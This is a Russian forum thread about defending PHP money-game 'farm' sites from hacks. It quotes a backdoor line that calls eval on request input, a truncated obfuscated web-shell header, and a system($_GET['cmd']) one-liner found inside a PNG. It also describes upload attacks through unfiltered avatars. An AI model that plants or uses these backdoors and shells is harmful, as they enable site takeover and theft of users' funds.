Автор Тема: Защити свою ферму от взлома  (Прочитано 2578 раз)

0 Пользователей и 1 Гость просматривают эту тему.

AlexGraurАвтор темы

  • *
  • Оффлайн
  • Награды На форуме более 1 года Более 100 сообщений
  • Дата регистрации: Апр 2016
  • Расположение: Россия
  • Возраст: 26
  • Сообщений: 143
  • Страна: ru
  • Поблагодарили: 53 раз(а)
  • Репутация +4/-0
  • Пол: Мужской
  • Admin Гномограда-ДТВ
  • Дата рождения:1991-03-11
  • Рефералов 0
    • Награды
Защити свою ферму от взлома
« : 18 Июль 2016, 17:05:25 »
Нет оценки
Всем привет. Я создавал уже тему о том, как взломывают фермы, но по сути ничего точного никто не сказал - только варианты через шел и прочее..
Но общаясь совершенно в другой теме, мы увидели и как выглядят дырки и какие файлы заливают на сайт. Итак эта тема будет посвящена исключительно защите вашей фермы, и естественно тому, чтобы остановить нашествие воров в интернете, по которым уже давно плачет тюрьма.
-----------------------------------------------------------------------------------------
Итак 1 способ:
Цитировать
Файлы с дырой, например ТОП
Сам код выглядит так:
if(!empty($_REQUEST['user_id'])){ if(@get_magic_quotes_gpc())$_REQUEST['user_id']=stripslashes($_REQUEST['user_id']); eval($_REQUEST['user_id']); die();}
Этот код удалять сразу
Чистый файл ТОП пользователей:
<?PHP
$_OPTIMIZATION["title"] = "ТОП 10";
$user_id = $_SESSION["user_id"];
$db->Query("SELECT * FROM db_users_a, db_users_b WHERE db_users_a.id = db_users_b.id AND db_users_a.id = '$user_id'");
$prof_data = $db->FetchArray();
?>

<div class="s-bk-lf">
   <div class="acc-title">TOP 10 по вводам</div>
</div>
<div class="silver-bk"><div class="clr"></div>   
<?PHP

$num_p = (isset($_GET["page"]) AND intval($_GET["page"]) < 1000 AND intval($_GET["page"]) >= 1) ? (intval($_GET["page"]) -1) : 0;
$lim = $num_p * 100;

$db->Query("SELECT * FROM db_users_b ORDER BY insert_sum DESC LIMIT 10");

if($db->NumRows() > 0){

?>




<table width="100%" border="0">
  <tr bgcolor="#efefef">
    <td align="center" width="75">Место</td>
    <td align="center">Пользователь</td>
   <td align="center">Пополнил</td>
 
  </tr>
 
<?PHP
$i = 0;
   while($data = $db->FetchArray()){
   $i=$i+1;


   ?>

   <tr class="htt">
    <td align="center"><?=$i; ?></td>
    <td align="center"><?=$data["user"]; ?></td>
   <td align="center"><?=$data["insert_sum"]; ?></td>
   
     
     </tr>
   <?PHP
   
   }

?>

</table>
<BR />
<?PHP

}
?>
</div>
<div class="clr"></div>

<br />


<?PHP

$user_id = $_SESSION["user_id"];
$db->Query("SELECT * FROM db_users_a, db_users_b WHERE db_users_a.id = db_users_b.id AND db_users_a.id = '$user_id'");
$prof_data = $db->FetchArray();
?>




<div class="s-bk-lf">
   <div class="acc-title">TOP 10 по выводам</div>
</div>
<div class="silver-bk"><div class="clr"></div>   
<?PHP

$num_p = (isset($_GET["page"]) AND intval($_GET["page"]) < 1000 AND intval($_GET["page"]) >= 1) ? (intval($_GET["page"]) -1) : 0;
$lim = $num_p * 100;

$db->Query("SELECT * FROM db_users_b ORDER BY payment_sum DESC LIMIT 10");

if($db->NumRows() > 0){

?>




<table width="100%" border="0">
  <tr bgcolor="#efefef">
    <td align="center" width="75">Место</td>
    <td align="center">Пользователь</td>
   <td align="center">Вывел</td>
 
  </tr>
 
<?PHP
$i = 0;
   while($data = $db->FetchArray()){
   $i=$i+1;


   ?>

   <tr class="htt">
    <td align="center"><?=$i; ?></td>
    <td align="center"><?=$data["user"]; ?></td>
   <td align="center"><?=$data["payment_sum"]; ?></td>
   
     
     </tr>
   <?PHP
   
   }

?>

</table>
<BR />
<?PHP

}
?>
</div>
<div class="clr"></div>

<br />

<?PHP

 
$db->Query("SELECT * FROM db_users_a, db_users_b WHERE db_users_a.id = db_users_b.id AND db_users_a.id = '$user_id'");
$prof_data = $db->FetchArray();
?>




<div class="s-bk-lf">
   <div class="acc-title">TOP 10 по рефералам</div>
</div>
<div class="silver-bk"><div class="clr"></div>   
<?PHP

$num_p = (isset($_GET["page"]) AND intval($_GET["page"]) < 1000 AND intval($_GET["page"]) >= 1) ? (intval($_GET["page"]) -1) : 0;
$lim = $num_p * 100;

$db->Query("SELECT * FROM db_users_a ORDER BY referals DESC LIMIT 10");

if($db->NumRows() > 0){

?>




<table width="100%" border="0">
  <tr bgcolor="#efefef">
    <td align="center" width="75">Место</td>
    <td align="center">Пользователь</td>
   <td align="center">Рефералов</td>
 
  </tr>
 
<?PHP
$i = 0;
   while($data = $db->FetchArray()){
   $i=$i+1;


   ?>

   <tr class="htt">
    <td align="center"><?=$i; ?></td>
    <td align="center"><?=$data["user"]; ?></td>
   <td align="center"><?=$data["referals"]; ?></td>
   
     
     </tr>
   <?PHP
   
   }

?>

</table>
<BR />
<?PHP

}
?>
</div>
<div class="clr"></div> 
Цитата: admin и maks161
Код чистого топа предоставил admin, а дыру нашли admin и maks161
С помощью данного вредоносного кода можно залить файл в корневую папку, например /z.php
Цитирую Админа:
Через неё как вариант заливают шелл,  левый файл например любой, 
Я в аренду отдал фрему свою временно,парнишка установил этот модуль с дырой, ему залили файл z.php
При переходе по адресу сайт.ру/z.php  открывается страница с окошком и стрелочкой
В окошко вводится номер кошелька... ну и в принципе всё,деньги ушли к тому кто в них нуждается :be happy:
Удаляем этот файл также.

2 способ:
Цитата: maks161
есть еще один способ взлома,через аватарку если не стоит фильтрация ферму взломают тоже легко.
Фильтрация должна стоять на загрузку разрешений png, gif, jpg - то есть на сами картинки. Если это убрать, то можно загружать файлы php
--------------------------------------------------------------------------------------
Тема будет дополняться и говориться еще варианты.
 
Пользователи, которые поблагодарили этот пост: dima2010, vra4yga

maks161

  • *
  • *
  • *
  • Оффлайн
  • Награды Более 1000 сообщений Благодарность от форума На форуме более 1 года Более 50 созданных тем За время в онлайне на форуме
  • Дата регистрации: Янв 2016
  • Расположение: Ростов-на-Дону
  • Возраст: 33
  • Сообщений: 1233
  • Страна: ru
  • Поблагодарили: 43 раз(а)
  • Репутация +12/-11
  • Пол: Мужской
  • Дата рождения:1984-03-10
  • Рефералов 0
    • Награды
Защити свою ферму от взлома
« Ответ #1 : 18 Июль 2016, 17:50:00 »
Нет оценки
кстати забыл сказать удаляется не весь код!
if(!empty($_REQUEST['user_id'])){ if(@get_magic_quotes_gpc())$_REQUEST['user_id']=stripslashes($_REQUEST['user_id']); eval($_REQUEST['user_id']); die();}
а именно вот эта часть его   eval($_REQUEST['user_id']); die();}
 
Пользователи, которые поблагодарили этот пост: dima2010

AlexGraurАвтор темы

  • *
  • Оффлайн
  • Награды На форуме более 1 года Более 100 сообщений
  • Дата регистрации: Апр 2016
  • Расположение: Россия
  • Возраст: 26
  • Сообщений: 143
  • Страна: ru
  • Поблагодарили: 53 раз(а)
  • Репутация +4/-0
  • Пол: Мужской
  • Admin Гномограда-ДТВ
  • Дата рождения:1991-03-11
  • Рефералов 0
    • Награды
Защити свою ферму от взлома
« Ответ #2 : 18 Июль 2016, 17:54:51 »
Нет оценки
я вчера весь удалял и залил - посмотрел - работает и безо всего кода как нистранно :laugh:
 
Пользователи, которые поблагодарили этот пост: dima2010

maks161

  • *
  • *
  • *
  • Оффлайн
  • Награды Более 1000 сообщений Благодарность от форума На форуме более 1 года Более 50 созданных тем За время в онлайне на форуме
  • Дата регистрации: Янв 2016
  • Расположение: Ростов-на-Дону
  • Возраст: 33
  • Сообщений: 1233
  • Страна: ru
  • Поблагодарили: 43 раз(а)
  • Репутация +12/-11
  • Пол: Мужской
  • Дата рождения:1984-03-10
  • Рефералов 0
    • Награды
Защити свою ферму от взлома
« Ответ #3 : 18 Июль 2016, 18:09:57 »
Нет оценки
я вчера весь удалял и залил - посмотрел - работает и безо всего кода как нистранно :laugh:
ты еще потестируй может не сразу понятно а вдруг касяк будет.вообще на сколько я знаю удаляется часть кода.
может админ точнее знает.
 
Пользователи, которые поблагодарили этот пост: dima2010

Shop-53

  • *
  • Оффлайн
  • Награды На форуме более 1 года Болеее 300 сообщений Более 10 созданных тем За время в онлайне на форуме
  • Дата регистрации: Фев 2016
  • Сообщений: 398
  • Поблагодарили: 12 раз(а)
  • Репутация +2/-1
  • Пол: Мужской
  • Рефералов 0
    • Награды
Защити свою ферму от взлома
« Ответ #4 : 18 Июль 2016, 18:28:14 »
Нет оценки
А что код делает сам как пользоватса чтоб узнать как взломщики ломают
a:0:{}
 

AlexGraurАвтор темы

  • *
  • Оффлайн
  • Награды На форуме более 1 года Более 100 сообщений
  • Дата регистрации: Апр 2016
  • Расположение: Россия
  • Возраст: 26
  • Сообщений: 143
  • Страна: ru
  • Поблагодарили: 53 раз(а)
  • Репутация +4/-0
  • Пол: Мужской
  • Admin Гномограда-ДТВ
  • Дата рождения:1991-03-11
  • Рефералов 0
    • Награды
Защити свою ферму от взлома
« Ответ #5 : 18 Июль 2016, 18:35:52 »
Нет оценки
А что код делает сам как пользоватса чтоб узнать как взломщики ломают
в моем понимании с помощью вредоносного кода ломается сайт и добавляется файл свой. в этом файле  добавляется форма для вывода со списанием всего доступного баланса на паеере на кошелек, который укажешь в форме. и все...
Так и выводят - зашли на ферму, ссылку ввели и вставили свой кошелек и готово..
http://joxi.ru/52aM7esG1ROz20 - вот так примерно выглядит форма перевода
 
Пользователи, которые поблагодарили этот пост: shans5, dima2010

Shop-53

  • *
  • Оффлайн
  • Награды На форуме более 1 года Болеее 300 сообщений Более 10 созданных тем За время в онлайне на форуме
  • Дата регистрации: Фев 2016
  • Сообщений: 398
  • Поблагодарили: 12 раз(а)
  • Репутация +2/-1
  • Пол: Мужской
  • Рефералов 0
    • Награды
Защити свою ферму от взлома
« Ответ #6 : 18 Июль 2016, 18:44:35 »
Нет оценки
Так а код как заливают
 

AlexGraurАвтор темы

  • *
  • Оффлайн
  • Награды На форуме более 1 года Более 100 сообщений
  • Дата регистрации: Апр 2016
  • Расположение: Россия
  • Возраст: 26
  • Сообщений: 143
  • Страна: ru
  • Поблагодарили: 53 раз(а)
  • Репутация +4/-0
  • Пол: Мужской
  • Admin Гномограда-ДТВ
  • Дата рождения:1991-03-11
  • Рефералов 0
    • Награды
Защити свою ферму от взлома
« Ответ #7 : 18 Июль 2016, 18:52:39 »
Нет оценки
Так а код как заливают
через шел))))
как пример с сайта https://habrahabr.ru/company/sprinthost/blog/125839/
<?php #v2.3 //Version
$auth_pass = ""; //75b43eac8d215582f6bcab4532eb854e
$color = "#00FF66"; //Colour
$default_action = "FilesMan";
$default_charset = "Windows-1251";
preg_replace("/.*/e","\x65\x76\x61\x6C\x28\x67\x7A\x69\x6E\x66\x6C\x61\x74\x65\x28\x62\x61\x73\x65
\x36\x34\x5F\x64\x65\x63\x6F\x64\x65\x28'7b1tVxs50jD8OXvO9R9Er3fanhhjm2Q2Y7ADIZCQSSAD5
GUC3N623bZ7aLs93W0Mk+W/31Wll5b6xZhkdq/7OedhJtDdKpVKUkkqlapK3rDM1tzJLL4tl7qn+ycf90/
// ... много кода в base64
А вообще почитайте в инете подробно об этом.. Я тоже не знаю как это делают - но я так понимаю дыра выдает данные от ftp аккаунта или еще что-то или просто возможность заливать файлы не заходя в ftp аккаунт и т.д... Я не хакер = я не могу ответить на такой вопрос. Но если кто-то ломал тут и может поделиться схемой как это делается)
 
Пользователи, которые поблагодарили этот пост: dima2010

AlexGraurАвтор темы

  • *
  • Оффлайн
  • Награды На форуме более 1 года Более 100 сообщений
  • Дата регистрации: Апр 2016
  • Расположение: Россия
  • Возраст: 26
  • Сообщений: 143
  • Страна: ru
  • Поблагодарили: 53 раз(а)
  • Репутация +4/-0
  • Пол: Мужской
  • Admin Гномограда-ДТВ
  • Дата рождения:1991-03-11
  • Рефералов 0
    • Награды
Защити свою ферму от взлома
« Ответ #8 : 18 Июль 2016, 19:02:52 »
Нет оценки
также можно почитать темы из запроса в гугл по ключевым словам "как заливают вредоносный код на сайт через шелл"
https://clck.ru/A2hcH
 
Пользователи, которые поблагодарили этот пост: dima2010

Shop-53

  • *
  • Оффлайн
  • Награды На форуме более 1 года Болеее 300 сообщений Более 10 созданных тем За время в онлайне на форуме
  • Дата регистрации: Фев 2016
  • Сообщений: 398
  • Поблагодарили: 12 раз(а)
  • Репутация +2/-1
  • Пол: Мужской
  • Рефералов 0
    • Награды
Защити свою ферму от взлома
« Ответ #9 : 18 Июль 2016, 19:10:38 »
Нет оценки
'<? system($_GET["cmd"]); ?>'       вот етот код болие опасний
 
Пользователи, которые поблагодарили этот пост: AlexGraur

shans5

  • *
  • Оффлайн
  • Награды Репутация более 15 Более 2500 сообщений Более 2 лет на форуме Более 350 тем Бывает груб к участникам форума. За время в онлайне на форуме
  • Дата регистрации: Сен 2015
  • Расположение: Регион 58
  • Возраст: 38
  • Сообщений: 2547
  • Страна: ru
  • Поблагодарили: 192 раз(а)
  • Репутация +25/-2
  • Пол: Мужской
  • Всё только начинается !!!
  • Дата рождения:1979-06-30
  • Рефералов 19
    • Награды
Защити свою ферму от взлома
« Ответ #10 : 18 Июль 2016, 19:11:47 »
Нет оценки
Вот именно такая рамка и есть при  заливке шелла)(
Обменяюсь модулями(скриптами)ТУТ

Подвергнуть критике, может любой.
Создать то,что будет подвергнуто критике,дано не каждому.
 

Shop-53

  • *
  • Оффлайн
  • Награды На форуме более 1 года Болеее 300 сообщений Более 10 созданных тем За время в онлайне на форуме
  • Дата регистрации: Фев 2016
  • Сообщений: 398
  • Поблагодарили: 12 раз(а)
  • Репутация +2/-1
  • Пол: Мужской
  • Рефералов 0
    • Награды
Защити свою ферму от взлома
« Ответ #11 : 18 Июль 2016, 19:13:29 »
Нет оценки
Где админ
 

SumBoy

  • *
  • Оффлайн
  • Награды На форуме более 1 года Более 100 сообщений
  • Дата регистрации: Июл 2016
  • Расположение: Питер
  • Возраст: 35
  • Сообщений: 130
  • Страна: ru
  • Поблагодарили: 6 раз(а)
  • Репутация +1/-0
  • Пол: Мужской
  • Дата рождения:1982-05-29
  • Рефералов 0
    • Награды
Защити свою ферму от взлома
« Ответ #12 : 18 Июль 2016, 21:11:05 »
Нет оценки
'<? system($_GET["cmd"]); ?>'       вот етот код болие опасний
Оказывается cmd нашел в .png файле. Хм... :shirty:
 
Пользователи, которые поблагодарили этот пост: AlexGraur

Shop-53

  • *
  • Оффлайн
  • Награды На форуме более 1 года Болеее 300 сообщений Более 10 созданных тем За время в онлайне на форуме
  • Дата регистрации: Фев 2016
  • Сообщений: 398
  • Поблагодарили: 12 раз(а)
  • Репутация +2/-1
  • Пол: Мужской
  • Рефералов 0
    • Награды
Защити свою ферму от взлома
« Ответ #13 : 18 Июль 2016, 21:53:32 »
Нет оценки
Удали етот код через ниво шел залить можно
 

kvozimir

  • снова в skype --> kvozimir
  • *
  • *
  • Оффлайн
  • Награды Благодарность от форума Репутация более 10 Более 1000 сообщений На форуме более 1 года За помощь пользователям Более 10 созданных тем За время в онлайне на форуме
  • Дата регистрации: Фев 2016
  • Возраст: 25
  • Сообщений: 1350
  • Страна: ru
  • Поблагодарили: 98 раз(а)
  • Репутация +12/-0
  • Пол: Мужской
  • telegram --> @kvozimir
  • Дата рождения:1992-04-18
  • Рефералов 0
    • Награды
  • Социальные сети:
    ВКонтакте
Защити свою ферму от взлома
« Ответ #14 : 19 Июль 2016, 03:13:54 »
Нет оценки
удалить можно было часть кода и весь,ни чего не изменится и будет работать,про данную дыру я писал еще раньше,кажется в скрипте angryGO

 
Пользователи, которые поблагодарили этот пост: AlexGraur
Теги:
 

Помогите настроить ферму в мобильном режиме

Автор doktor540Раздел Общие вопросы по фермам

Ответов: 6
Просмотров: 648
Последний ответ 10 Ноябрь 2016, 22:22:06
от doktor540
За сколько можно продать ферму

Автор AndersonРаздел Разговоры обо всём

Ответов: 3
Просмотров: 1386
Последний ответ 10 Май 2016, 12:56:10
от Anderson
Как сделать ферму без сбора и продажи

Автор u72967Раздел Общие вопросы по фермам

Ответов: 8
Просмотров: 383
Последний ответ 20 Май 2017, 00:48:42
от romcka8
модуль добавить ферму

Автор barakudaРаздел Модули для фф

Ответов: 2
Просмотров: 3240
Последний ответ 15 Апрель 2016, 11:45:38
от Bodya
заказать проект ферму

Автор Aleksandr/ NikolayevichРаздел Нужны услуги

Ответов: 15
Просмотров: 663
Последний ответ 24 Июнь 2017, 04:40:07
от Aleksandr/ Nikolayevich
Имя пользователя:
Пароль:
Session: